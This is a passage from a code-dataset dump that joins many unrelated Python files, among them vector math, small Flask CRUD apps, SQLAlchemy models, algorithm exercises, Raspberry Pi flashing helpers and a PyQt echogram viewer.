X.flatten()\n return cls(X[0], X[1], X[2])\n if len(X.shape) == 2 and X.shape[1] == 3:\n return cls(\n X[:, 0].copy(), X[:, 1].copy(), X[:, 2].copy()\n )\n raise ValueError(\n 'Unexpected shape for vector init: {shp}'.format(\n shp=X.shape\n )\n )\n if np.isscalar(X) and np.isscalar(Y) and np.isscalar(Z):\n X, Y, Z = float(X), float(Y), float(Z)\n elif not (isinstance(X, type(Y)) and isinstance(X, type(Z))):\n raise TypeError('Must be the same types for x, y, and '\n 'z for vector init')\n if isinstance(X, np.ndarray):\n if not (X.shape == Y.shape and X.shape == Z.shape):\n raise ValueError('Must be the same shapes for x, y, '\n 'and z in vector init')\n vec_ndarray = np.c_[X, Y, Z]\n vec_ndarray = vec_ndarray.astype(float)\n return vec_ndarray.view(cls)\n if X is None:\n X, Y, Z = 
0.0, 0.0, 0.0\n vec_ndarray = np.r_[X, Y, Z].reshape((1, 3))\n return np.asarray(vec_ndarray).view(cls)\n\n return read_array(x, y, z)\n\n def __array_wrap__(self, out_arr, context=None): #pylint: disable=no-self-use, unused-argument\n if len(out_arr.shape) != 2 or out_arr.shape[1] != 3:\n out_arr = out_arr.view(np.ndarray)\n return out_arr\n\n def __array_finalize__(self, obj):\n if obj is None or obj.__class__ is Vector3Array:\n return\n if len(self.shape) != 2 or self.shape[1] != 3: #pylint: disable=unsubscriptable-object\n raise ValueError(\n 'Invalid array to view as Vector3Array - must be '\n 'array of shape (*, 3).'\n )\n\n def __getitem__(self, i):\n \"\"\"Overriding _getitem__ allows coercion to Vector3 or ndarray\"\"\"\n item_out = super(Vector3Array, self).__getitem__(i)\n if np.isscalar(i):\n return item_out.view(Vector3)\n if isinstance(i, slice):\n return item_out\n return item_out.view(np.ndarray)\n\n @property\n def z(self):\n \"\"\"Array of z-component of vectors\"\"\"\n return self[:, 2]\n\n @z.setter\n def z(self, value):\n self[:, 2] = value\n\n @property\n def dims(self):\n return ('x', 'y', 'z')\n\n def cross(self, vec):\n \"\"\"Cross product with another Vector3Array\"\"\"\n if not isinstance(vec, Vector3Array):\n raise TypeError('Cross product operand must be a Vector3Array')\n if self.nV != 1 and vec.nV != 1 and self.nV != vec.nV:\n raise ValueError('Cross product operands must have the same '\n 'number of elements.')\n return Vector3Array(np.cross(self, vec))\n\n\nclass Vector2Array(BaseVectorArray):\n \"\"\"List of Vector2\n\n A new Vector2Array can be created with:\n - another Vector2Array\n - x/y lists of equal length\n - n x 2 array\n - nothing (returns [[0., 0.]])\n \"\"\"\n\n def __new__(cls, x=None, y=None): #pylint: disable=arguments-differ\n\n def read_array(X, Y):\n \"\"\"Build Vector2Array from various inputs\"\"\"\n if isinstance(X, cls) and Y is None:\n X = np.atleast_2d(X)\n return cls(X.x.copy(), X.y.copy())\n if isinstance(X, (list, tuple)):\n X = np.array(X)\n if isinstance(Y, (list, tuple)):\n Y = np.array(Y)\n if isinstance(X, np.ndarray) and Y is None:\n X = np.squeeze(X)\n if X.size == 2:\n X = X.flatten()\n return cls(X[0], X[1])\n if len(X.shape) == 2 and X.shape[1] == 2:\n return cls(\n X[:, 0].copy(), X[:, 1].copy()\n )\n raise ValueError(\n 'Unexpected shape for vector init: {shp}'.format(\n shp=X.shape\n )\n )\n if np.isscalar(X) and np.isscalar(Y):\n X, Y = float(X), float(Y)\n elif not isinstance(X, type(Y)):\n raise TypeError('Must be the same types for x and y '\n 'for vector init')\n if isinstance(X, np.ndarray):\n if X.shape != Y.shape:\n raise ValueError('Must be the same shapes for x and y '\n 'in vector init')\n vec_ndarray = np.c_[X, Y]\n vec_ndarray = vec_ndarray.astype(float)\n return vec_ndarray.view(cls)\n if X is None:\n X, Y = 0.0, 0.0\n vec_ndarray = np.r_[X, Y].reshape((1, 2))\n return np.asarray(vec_ndarray).view(cls)\n\n return read_array(x, y)\n\n def __array_wrap__(self, out_arr, context=None): #pylint: disable=no-self-use, unused-argument\n if len(out_arr.shape) != 2 or out_arr.shape[1] != 2:\n out_arr = out_arr.view(np.ndarray)\n return out_arr\n\n def __array_finalize__(self, obj):\n if obj is None or obj.__class__ is Vector2Array:\n return\n if len(self.shape) != 2 or self.shape[1] != 2: #pylint: disable=unsubscriptable-object\n raise ValueError(\n 'Invalid array to view as Vector2Array - must be '\n 'array of shape (*, 2).'\n )\n\n def __getitem__(self, i):\n \"\"\"Overriding _getitem__ allows coercion to 
Vector2 or ndarray\"\"\"\n item_out = super(Vector2Array, self).__getitem__(i)\n if np.isscalar(i):\n return item_out.view(Vector2)\n if isinstance(i, slice):\n return item_out\n return item_out.view(np.ndarray)\n\n @property\n def dims(self):\n return ('x', 'y')\n","sub_path":"vectormath/vector.py","file_name":"vector.py","file_ext":"py","file_size_in_byte":20407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"118906329","text":"from flask import Flask, request\r\nfrom mysqlhandler import sqlhandler\r\n\r\n# create the Flask app\r\napp = Flask(__name__)\r\n\r\n\r\n\r\n@app.route('/user/add',methods=['POST'])\r\ndef add(): \r\n \r\n data=request.get_json()\r\n \r\n sqlhandler.func(data,1)\r\n return(\"User Added\")\r\n\r\n@app.route('/user/delete',methods=['POST'])\r\ndef delete(): \r\n \r\n data=request.get_json()\r\n \r\n sqlhandler.func(data,3)\r\n return(\"User Deleted\")\r\n\r\n@app.route('/user/update',methods=['POST'])\r\ndef update(): \r\n \r\n data=request.get_json()\r\n \r\n sqlhandler.func(data,2)\r\n return(\"User Updated\")\r\n\r\n@app.route('/user/view',methods=['GET'])\r\ndef display(): \r\n data=dict()\r\n sqlhandler.func(data,4)\r\n return(\"Info Displayed on Terminal\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n # run app in debug mode on port 5000\r\n app.run(debug=True)","sub_path":"lab_3/dbhandler/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"233986219","text":"import pytest\n\nfrom kestrel.session import Session\n\n\ndef test_copy_and_merge():\n with Session() as s:\n stmt = \"\"\"\nnewips = NEW ipv4-addr [\"127.0.0.1\", \"127.0.1.15\"]\nip2 = NEW ipv4-addr [\"10.0.1.1\", \"10.0.2.2\", \"10.0.3.3\"]\nip1 = newips\nip3 = ip1 + ip2\n\"\"\"\n s.execute(stmt)\n newips = s.get_variable(\"newips\")\n assert len(newips) == 2\n assert newips[0][\"type\"] == \"ipv4-addr\"\n values = [newips[i][\"value\"] for i in [0, 1]]\n values.sort()\n assert values == [\"127.0.0.1\", \"127.0.1.15\"]\n\n ip2 = s.get_variable(\"ip2\")\n assert len(ip2) == 3\n assert ip2[0][\"type\"] == \"ipv4-addr\"\n values = [row[\"value\"] for row in ip2]\n values.sort()\n assert values == [\"10.0.1.1\", \"10.0.2.2\", \"10.0.3.3\"]\n\n ip1 = s.get_variable(\"ip1\")\n assert len(ip1) == 2\n assert ip1[0][\"type\"] == \"ipv4-addr\"\n values = [row[\"value\"] for row in ip1]\n values.sort()\n assert values == [\"127.0.0.1\", \"127.0.1.15\"]\n\n ip3 = s.get_variable(\"ip3\")\n assert len(ip3) == 5\n assert ip3[0][\"type\"] == \"ipv4-addr\"\n values = [row[\"value\"] for row in ip3]\n values.sort()\n assert values == [\"10.0.1.1\", \"10.0.2.2\", \"10.0.3.3\", \"127.0.0.1\", \"127.0.1.15\"]\n","sub_path":"tests/test_command_merge.py","file_name":"test_command_merge.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"467530986","text":"import datetime\n\nfrom sqlalchemy import func\nfrom sqlalchemy.ext.hybrid import hybrid_property\nfrom sqlalchemy_utils import IPAddressType\n\nfrom lessee import db\n\nPLATFORM_LIST = (\n 'PC',\n 'PS4',\n 'XboxOne',\n)\n\n\ndef populate_platforms():\n platforms = Platform.query.all()\n if not platforms:\n for platform_name in PLATFORM_LIST:\n new_platform = Platform(name=platform_name)\n db.session.add(new_platform)\n db.session.commit()\n\n\nclass BaseMixin(object):\n id = db.Column(\n 
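# Auto-incrementing integer primary key shared by every model that mixes this in.\n 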
db.Integer,\n index=True,\n autoincrement=True,\n primary_key=True\n )\n\n\nclass TimestampMixin(object):\n created_at = db.Column(\n db.DateTime,\n default=func.now()\n )\n modified_at = db.Column(\n db.DateTime,\n default=func.now(),\n onupdate=func.now()\n )\n\n\nclass Platform(db.Model, BaseMixin):\n name = db.Column(db.String(50), unique=True)\n hardwares = db.relationship('Hardware', backref='platform', lazy=True)\n\n def __init__(self, name):\n self.name = name\n\n\nclass Hardware(db.Model, BaseMixin, TimestampMixin):\n name = db.Column(\n db.String(80),\n unique=True,\n )\n ip = db.Column(\n IPAddressType,\n unique=True,\n )\n platform_id = db.Column(\n db.Integer,\n db.ForeignKey('platform.id'),\n )\n leases = db.relationship('Lease', backref='hardware', lazy='dynamic')\n __table_args__ = (\n db.UniqueConstraint(\n 'ip',\n 'platform_id',\n 'name',\n ),\n )\n\n def __init__(self, name, ip, platform):\n self.name = name\n self.ip = ip\n self.platform = platform\n\n @hybrid_property\n def leased(self):\n if self.status == 'leased':\n return True\n return False\n\n @hybrid_property\n def status(self):\n lease_query = Lease.query.filter_by(\n hardware_id=self.id\n )\n if lease_query.count():\n now = datetime.datetime.now()\n if lease_query.filter(\n Lease.start < now,\n Lease.end > now,\n ).count():\n return 'leased'\n return 'available'\n\n\nclass Lease(db.Model, BaseMixin, TimestampMixin):\n hardware_id = db.Column(\n db.Integer,\n db.ForeignKey('hardware.id'),\n )\n start = db.Column(db.DateTime)\n end = db.Column(db.DateTime)\n\n def __init__(self, hardware, start, end):\n self.hardware = hardware\n self.start = start\n self.end = end","sub_path":"lessee/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"296889582","text":"#find min number of coins from the given coins to make the given sum\n\ncoins=list(map(int, input('Enter coins (separated by space) : ').split()))\nw=int(input('Enter sum : '))\n\nif min(coins)>w:\n\tprint(\"Invalid data.\")\n\texit()\n\nans=[[]]\n\nfor i in range(0,len(coins)):\n\tans.append([0])\nfor j in range(0,w+1):\n\tans[0].append(j)\n\nfor i in range(1,len(coins)+1):\n\tfor j in range(1,w+1):\n\t\tif coins[i-1]>j:\n\t\t\tans[i].append(ans[i-1][j])\n\t\telse:\n\t\t\tt=coins[i-1]\n\t\t\ta=min(ans[i-1][j],(1+(ans[i][j-t])))\n\t\t\tans[i].append(a)\n\t\t\t\nprint(ans[-1][-1])\n","sub_path":"coinchange1.py","file_name":"coinchange1.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"301415902","text":"import pandas as pd\nfrom sklearn import linear_model\nimport matplotlib.pyplot as plt\n# %matplotlib inline\n\n# Loading dataset\ndataset = pd.read_csv('input_data.csv')\nprint (len(dataset))\nprint (dataset.columns.values)\n\n#split dataset\ndef split_data(dataset):\n square_feet_values = []\n price_values = []\n for square_feet, price in zip(dataset['square_feet'], dataset['price']):\n square_feet_values.append([square_feet])\n price_values.append(price)\n return square_feet_values, price_values\n\ntrain_x, train_y = split_data(dataset)\nprint (train_x)\nprint (train_y)\n\n#build simple regression model\nregr = linear_model.LinearRegression()\nregr.fit(train_x, train_y)\n\n#fit the model\nplt.scatter(train_x, train_y, color = 'blue')\nplt.plot(train_x, regr.predict(train_x), color = 'red', linewidth = 4)\n# plt.show()\n\n#predict price for 
700sq\nprediction = regr.predict([[700]])\nprint(prediction)\n\n#extra\nplt.scatter(700, prediction, color = 'red')\nplt.show()\n","sub_path":"Data Mining with Python_Implementing Classification and Regression/12_Basic Regression Model Implementation to Predict House Prices.py","file_name":"12_Basic Regression Model Implementation to Predict House Prices.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"399039663","text":"from time import sleep\r\nimport os\r\n\r\n\r\ndef com_init():\r\n    error_msg = \"\"\"\r\n    SMBus(1) - error\\nI2C communication doesn't work properly\r\n    Check if the I2C interface is enabled with 'sudo raspi-config'\r\n    You may also try installing smbus manually with 'sudo apt install python3-smbus'\r\n    \"\"\"\r\n    err_time = 1\r\n    bus = 0\r\n    try:\r\n        from smbus import SMBus  # works only on Pi\r\n        bus = SMBus(1)  # indicates /dev/ic2-1 - correct i2c bus for most Pies\r\n    except PermissionError as perm_error:\r\n        print(error_msg)\r\n        print(perm_error)\r\n        sleep(err_time)\r\n    except NameError as name_error:\r\n        print(error_msg)\r\n        print(name_error)\r\n        sleep(err_time)\r\n    except ModuleNotFoundError as no_mod_err:\r\n        print(error_msg)\r\n        print(no_mod_err)\r\n        sleep(err_time)\r\n    finally:\r\n        return bus\r\n\r\n\r\ndef reset_gpio_pin(gpio_reset_pin):\r\n    try:\r\n        import RPi.GPIO as GPIO\r\n        GPIO.setwarnings(False)\r\n        GPIO.setmode(GPIO.BCM)  # Use BCM pin numbering\r\n        GPIO.setup(gpio_reset_pin, GPIO.OUT, initial=GPIO.HIGH)\r\n        GPIO.output(gpio_reset_pin, GPIO.HIGH)\r\n        sleep(0.1)\r\n        GPIO.output(gpio_reset_pin, GPIO.LOW)\r\n        print(\"gpio pin reset\")\r\n        sleep(0.1)\r\n        GPIO.output(gpio_reset_pin, GPIO.HIGH)\r\n        sleep(0.1)\r\n    except AttributeError:\r\n        print(\"AttributeError - that feature works only on Pi\")\r\n        sleep(1)\r\n    except NameError:\r\n        print(\"NameError - that feature works only on Pi\")\r\n        sleep(1)\r\n    except ModuleNotFoundError:\r\n        print(\"GPIO import - failed - works only on Pi\")\r\n        sleep(1)\r\n\r\n\r\ndef prepare_mate_node(addr):\r\n    def calculate_checksum(data):\r\n        checksum = sum(data) & 0xFF\r\n        return checksum\r\n\r\n    bus = com_init()\r\n    sleep_amt = 1\r\n    on, off = [1], [0]\r\n    reset_mate_node_command = 0x79\r\n    on.append(calculate_checksum(on))\r\n    off.append(calculate_checksum(off))\r\n    sleep(sleep_amt)\r\n    bus.write_i2c_block_data(addr, reset_mate_node_command, on)\r\n    print(\"on command sent\")\r\n    sleep(sleep_amt)\r\n    bus.write_i2c_block_data(addr, reset_mate_node_command, off)\r\n    print(\"off command sent\")\r\n    sleep(sleep_amt)\r\n    bus.write_i2c_block_data(addr, reset_mate_node_command, on)\r\n    print(\"on command sent\")\r\n    sleep(0.2)\r\n\r\n\r\ndef flash_mate_node(config, firmware_version):\r\n    avrdude_action = f\"avrdude -v -p atmega328p -c arduino -P /dev/{config.port_name} -b 57600 -U \\\r\n    flash:w:/home/{config.user}/RH-ota/firmware/{firmware_version}.hex:i\"\r\n    os.system(f\"{avrdude_action}\")\r\n\r\n\r\ndef main():\r\n    print(\"Use file nodes_flash.py as an opening file instead\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()\r\n","sub_path":"nodes_flash_common.py","file_name":"nodes_flash_common.py","file_ext":"py","file_size_in_byte":2724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"487567419","text":"'''\nWidget animation\n================\n\nThis shows an example of creating an animation, and how you can apply it to a\nwidget.\n'''\n\nimport kivy\nimport math\nkivy.require('1.0.7')\n\nfrom 
kivy.animation import Animation\nfrom kivy.app import App\nfrom kivy.uix.button import Button\n\n\nclass TestApp(App):\n\n def animate(self, instance):\n divisor = 3\n max_rad = math.pi/2\n increment = math.pi/divisor\n animation = Animation(pos=(300, 200), t='linear')\n for i in range(1,math.floor(max_rad/increment) + 1):\n # create an animation object. \n animation = animation + Animation(pos=(math.cos(increment*i)*100+200, math.sin(increment*i)*100+200), t='linear')\n\n # apply the animation on the button, passed in the \"instance\" argument\n animation.start(instance)\n\n def build(self):\n # create a button, and attach animate() method as an on_press handler\n button = Button(size_hint=(None, None), text='plop', pos=(200, 200))\n button.bind(on_press=self.animate)\n return button\n\nif __name__ in ('__main__', '__android__'):\n TestApp().run()\n\n","sub_path":"CircularAnimation/animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":1131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"431596777","text":"class Solution:\r\n def solveSudoku(self, board: List[List[str]]) -> None:\r\n \"\"\"\r\n Do not return anything, modify board in-place instead.\r\n \"\"\"\r\n self.rows = [set(range(1, 10)) for _ in range(9)]\r\n self.cols = [set(range(1, 10)) for _ in range(9)]\r\n self.block = [set(range(1, 10)) for _ in range(9)]\r\n self.empty = []\r\n for row in range(9):\r\n for col in range(9):\r\n if board[row][col] != '.':\r\n cur = int(board[row][col])\r\n self.rows[row].remove(cur)\r\n self.cols[col].remove(cur)\r\n self.block[(row//3)*3+(col//3)].remove(cur)\r\n else:\r\n self.empty.append((row, col))\r\n self.backtrack(board, 0)\r\n\r\n def backtrack(self, board, iter):\r\n if iter == len(self.empty):\r\n return True\r\n i, j = self.empty[iter]\r\n b = (i // 3) * 3 + (j // 3)\r\n for val in self.rows[i] & self.cols[j] & self.block[b]:\r\n self.rows[i].remove(val)\r\n self.cols[j].remove(val)\r\n self.block[b].remove(val)\r\n board[i][j] = str(val)\r\n if self.backtrack(board, iter + 1):\r\n return True\r\n self.rows[i].add(val)\r\n self.cols[j].add(val)\r\n self.block[b].add(val)\r\n return False","sub_path":"Week_07/sudoku-solver.py","file_name":"sudoku-solver.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"29186743","text":"#!/usr/bin/env python3\n\n'''\nCOPYRIGHT Dazzy Ding, Peter Zhang 2015-2016\n'''\n\nimport sys\n\n# Coordinates of the game window's top-left corner\nif sys.platform == 'darwin':\n base = (0, 23)\nif sys.platform == 'linux':\n base = (0, 23)\nif sys.platform == 'win32':\n base = (0, 30)\n\n# Configure the system screen size; common values\n# screen_size = (1680, 1050) # Macbook Pro\n# screen_size = (1600, 900) # Linux VM\n# screen_size = (1920, 1080) # Windows\n\n# Port the API server listens on\nhost = (\"127.0.0.1\", 14585)\n\npoi_interaction = False\n","sub_path":"config.example.py","file_name":"config.example.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"340059827","text":"import struct\n\nimport sbigpy\n\nclass Temp_Status:\n def __init__(self):\n self.enabled = 0\n self.setpoint = 0\n self.output = 0\n self.samp_rate = sbigpy.ST5.DEFAULT_TEMP_SAMP_RATE\n self.p_gain = sbigpy.ST5.DEFAULT_TEMP_P_GAIN\n self.i_gain = sbigpy.ST5.DEFAULT_TEMP_I_GAIN\n self.brownout_detected = 0\n\n def unpack(self, data):\n (self.enabled,\n self.setpoint,\n self.output,\n self.samp_rate,\n 
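# The struct format '<7H' below unpacks seven little-endian unsigned\n # 16-bit values, matching these fields in declaration order.\n 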
self.p_gain,\n self.i_gain,\n self.brownout_detected) = struct.unpack('<7H', data)\n\n def prettyprint(self):\n print(\"Temp control enabled: %d\" % self.enabled)\n print(\"Temp setpoint: %d\" % self.setpoint)\n print(\"Temp output drive: %d\" % self.output)\n print(\"Temp sample rate: %d\" % self.samp_rate)\n print(\"Temp p_gain: %d\" % self.p_gain)\n print(\"Temp i_gain: %d\" % self.i_gain)\n print(\"Temp brownout detected: %d\" % self.brownout_detected)","sub_path":"sbigpy/temp_status.py","file_name":"temp_status.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"111767357","text":"from flask import Flask, render_template, request, redirect, session, jsonify\nfrom usuario import Usuario\nfrom veiculo import Veiculo\nfrom peewee import *\nimport os\nfrom playhouse.shortcuts import model_to_dict\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = '43r78934yt6y5907'\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n@app.route('/Cliente')\ndef Cliente():\n usuarios = list(map(model_to_dict, Usuario.select()))\n return jsonify(usuarios)\n@app.route('/Veiculos')\ndef Veiculos():\n veiculos = list(map(model_to_dict, Veiculo.select()))\n return jsonify(veiculos)\n@app.route('/Diagnosticos')\ndef Diagnostico():\n return render_template('Diagnosticos.html')\n\n\n@app.route(\"/incluirUsuario\", methods = ['post'])\ndef incluir():\n \n msg = jsonify({\"message\":\"ok\"})\n\n dados = request.get_json(force = True)\n\n nome= dados['nome']\n snome= dados['snome']\n sexo= dados['sexo']\n email= dados['email']\n tel= dados['telefone']\n cidade= dados['cidade']\n estado= dados['estado']\n Usuario.create(nome = nome, sobrenome = snome, sexo = sexo, email = email, telefone = tel, cidade= cidade\n , estado = estado)\n\n return msg\n\n@app.route(\"/incluirVeiculo\", methods = ['post'])\ndef incluirV():\n marca= request.form[\"marca\"]\n modelo= request.form[\"modelo\"]\n chassi= request.form[\"chassi\"]\n nome= request.form[\"nome\"] \n nmrPlaca= request.form[\"nmrPlaca\"]\n ano= request.form[\"ano\"]\n Veiculo.create(marca = marca, modelo = modelo, chassi = chassi, nome = nome, nmrPlaca = nmrPlaca, ano = ano)\n \n\n return redirect(\"/Veiculos\")\n\n@app.route(\"/excluir_usuario\")\ndef excluir_usuario():\n \n id = request.args.get(\"id\")\n\n Usuario.delete_by_id(id)\n \n return Cliente()\n\n@app.route(\"/Alt_cliente\")\ndef Alt_cliente():\n \n id = request.args.get(\"id\")\n \n usuario_alt = Usuario.get_by_id(id)\n \n return render_template(\"Alt_cliente.html\", usuario=usuario_alt)\n \n\n@app.route(\"/alterar_usuario\")\ndef alterar_usuario():\n id = request.args.get(\"id\")\n nome= request.args.get(\"nome\")\n snome= request.args.get(\"snome\")\n sexo= request.args.get(\"sexo\")\n email= request.args.get(\"email\")\n tel= request.args.get(\"telefone\")\n cidade= request.args.get(\"cidade\")\n estado= request.args.get(\"estado\")\n usuario = Usuario.get_by_id(id)\n \n usuario.nome = nome\n usuario.sobrenome = snome\n usuario.sexo = sexo\n usuario.email = email\n usuario.telefone = tel\n usuario.cidade = cidade\n usuario.estado = estado\n \n\n usuario.save()\n\n return redirect(\"Cliente\")\n\n@app.route(\"/login\", methods=['POST'])\ndef login():\n login = request.form[\"login\"]\n senha = request.form[\"senha\"]\n if login == 'admin' and senha == '123':\n session['usuario'] = login\n return redirect(\"/\")\n else:\n return render_template('Login.html')\n\n@app.route(\"/logout\")\ndef 
logout(): \n session.pop(\"usuario\")\n return redirect(\"/\")\n\n\napp.run(debug=True, port=4001)\n\n\n","sub_path":"SIMUCAR/Trabalho_Pt3/index_back.py","file_name":"index_back.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"242663903","text":"# -*- coding:utf-8 -*-\n\n# Problem (repeating decimal)\n\"\"\"\nA repeating decimal can be expressed as a fraction. Given a repeating decimal a whose integer part is 0 (a > 0.1),\nand whose repeating block starts at the tenths place, express a as a fraction n/m in lowest terms.\n\"\"\"\n\n# Algorithm\n\"\"\"\nx = 0.77777...\n10x = 7.7777... (the factor 10 matches the number of repeating digits)\n9x = 7 (subtracting removes the fractional part)\nx = 7/9\n\"\"\"\n\n# Input format\n\"\"\"\nA repeating decimal, shown only up to its first repeating block; e.g. 0.7 denotes the repeating decimal 0.777777...\n\"\"\"\n\n# Output format\n\"\"\"\nThe repeating decimal as a reduced fraction n/m\n\"\"\"\n\n# Sample input\n\"\"\"\n0.7\n\"\"\"\n\n# Sample output\n\"\"\"\n7/9\n\"\"\"\n\n\ndef Euclidean(a, b):\n \"\"\" Euclidean algorithm (successive division) \"\"\"\n if a < b:\n # keep the larger number in a\n a, b = b, a\n while b != 0:\n temp = a % b # remainder\n a = b\n b = temp\n return a\n\ndef Decimal_to_Fraction(decimal):\n \"\"\" Infinite repeating decimals are rational numbers, and every rational number can be written as one integer divided by another \"\"\"\n num = pow(10, len(decimal))\n a = Euclidean(int(decimal), (num-1))\n x = \"{0:d}/{1:d}\".format(int(decimal)//a, (num-1)//a)\n return x\n\nif __name__ == \"__main__\":\n integer, decimal = input(\"Enter a repeating decimal (integer part 0, showing only its first repeating block): \")\\\n .split(\".\")\n if int(integer) != 0:\n raise Exception(\"The integer part must be 0!\")\n else:\n print(Decimal_to_Fraction(decimal))\n\n","sub_path":"20_01_31 Exercises/15.py","file_name":"15.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"26251196","text":"\nimport os\nimport functools\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom PyQt5.QtCore import pyqtSlot\nfrom .ui import ui_echogram_viewer\n\nclass echogram_viewer(QtWidgets.QMainWindow, ui_echogram_viewer.Ui_echogram_viewer):\n\n def __init__(self, p_data, plot_attribute='Sv', parent=None):\n super(echogram_viewer, self).__init__(parent)\n self.setupUi(self)\n\n self.echogramLabel = None\n\n # connect the echogram signals\n self.QEchogramViewer.mousePress.connect(self.echogramClick)\n self.QEchogramViewer.mouseMove.connect(self.echogramMouseInWidget)\n self.QEchogramViewer.mouseRelease.connect(self.echogramUnClick)\n\n # restore the application state\n self.appSettings = QtCore.QSettings('afsc.noaa.gov', 'echogram_viewer')\n size = self.appSettings.value('winsize', QtCore.QSize(1000,600))\n position = self.appSettings.value('winposition', QtCore.QPoint(5,5))\n\n # get the virtual screen size\n screen = QtWidgets.QApplication.primaryScreen()\n v_screen_size = screen.availableVirtualSize()\n\n # check if our last window size is too big for our current screen\n if (size.width() > v_screen_size.width()):\n size.setWidth(v_screen_size.width() - 50)\n if (size.height() > v_screen_size.height()):\n size.setHeight(v_screen_size.height() - 50)\n\n # now check if our last position is at least on our current desktop\n # if it is off the screen we just throw it up at 0\n if (position.x() > size.width() - 50):\n position.setX(0)\n if (position.y() > size.height() - 50):\n position.setY(0)\n\n # now move and resize the window\n self.move(position)\n self.resize(size)\n\n # set the base directory path - this is the full path to this application\n self.baseDir = functools.reduce(lambda l,r: l + os.path.sep + r,\n os.path.dirname(os.path.realpath(__file__)).split(os.path.sep))\n try:\n self.setWindowIcon(QtGui.QIcon(self.baseDir + os.sep + 'resources/echoIcon.png'))\n except:\n pass\n\n self.update_echogram(p_data, plot_attribute)\n\n\n @pyqtSlot(object, object, 
int, object, list)\n def echogramClick(self, imageObj, clickLoc, button, modifier, items):\n pass\n# if (items):\n# print(\"Picked:\",items)\n\n\n @pyqtSlot(object, object, int, object, list)\n def echogramUnClick(self, imageObj, clickLoc, button, modifier, items):\n pass\n\n\n @pyqtSlot(object, object, object, list, list)\n def echogramMouseInWidget(self, imageObj, location, modifier, draggedItems, items):\n\n# if (items):\n# print(\"Dragged:\", items)\n\n if (location[0] != None):\n # update the depth/time at cursor label\n locationString = 'Depth: %.2fm Time: %s ' % (location[1],\n location[0].tolist().strftime('%m/%d/%Y %H:%M:%S'))\n self.echogramLabel.setText(locationString)\n\n # force a redraw of the echogram so the label is refreshed\n self.QEchogramViewer.viewport().update()\n\n\n def update_echogram(self, p_data, plot_attribute='Sv'):\n \"\"\"\n update_echogram updates the echogram image using data from the provided\n processed_data object\n \"\"\"\n\n # clear out the echogram viewer\n self.QEchogramViewer.clearViewer()\n\n if hasattr(p_data, 'range'):\n y_axis = p_data.range\n else:\n y_axis = p_data.depth\n\n # set the Echogram data\n self.QEchogramViewer.setEchogramFromArray(p_data.data, yaxis=y_axis,\n xaxis=p_data.ping_time)\n\n # add the echogram HUD text\n self.echogramLabel = self.QEchogramViewer.addHudText(QtCore.QPointF(0.99,0.995),\n '', color=[0,250,0], alpha=200, halign='right', valign='bottom')\n self.echogramLabel.setBackground([0,0,0], 250)\n\n # fill the echogram window - vertical extent only\n self.QEchogramViewer.fillExtent(verticalOnly=True)\n\n\n\n def add_line(self, line, **kwargs):\n\n self.QEchogramViewer.addLine([line.ping_time, line.data], **kwargs)\n\n def closeEvent(self, event):\n\n # store the application size and position\n self.appSettings.setValue('winposition', self.pos())\n self.appSettings.setValue('winsize', self.size())\n\n event.accept()\n\n\n\n","sub_path":"echolab2/plotting/qt/echogram_viewer.pyw","file_name":"echogram_viewer.pyw","file_ext":"pyw","file_size_in_byte":4429,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"371269689","text":"#!/usr/bin/env python\n\nimport optparse\nimport os\nimport os.path\nimport re\nimport subprocess\nimport sys\n\ndef ParseCommandLine():\n parser = optparse.OptionParser(usage = \"Usage: %prog [options] repo builddir\")\n parser.add_option(\"-c\", \"--compress\", dest=\"compress\", action=\"store_true\", default=False, help=\"compress output files\")\n parser.add_option(\"-n\", \"--nexus\", dest=\"nexus\", action=\"store_true\", default=False, help=\"upload output files to Eclipse Nexus\")\n parser.add_option(\"-s\", \"--snapshot\", dest=\"snapshot\", action=\"store_true\", default=False, help=\"deploy to Eclipse Nexus as a snapshot\")\n parser.add_option(\"-r\", \"--release\", dest=\"release\", action=\"store_true\", default=False, help=\"deploy to Eclipse Nexus as a release\")\n parser.add_option(\"-a\", \"--application\", dest=\"application\", action=\"store_true\", default=False, help=\"package as application\")\n (options, args) = parser.parse_args()\n\n if len(args) != 2:\n parser.error(\"wrong number of positional arguments\")\n\n return options, args[0], args[1]\n\ndef SanitisePath(path):\n return os.path.realpath(path)\n\ndef GetSlug(repo, path, application):\n def CaptureOutput(arguments):\n try:\n proc = subprocess.Popen(arguments, stdout=subprocess.PIPE)\n (stdout, stderr) = proc.communicate()\n except:\n return None\n if proc.returncode 
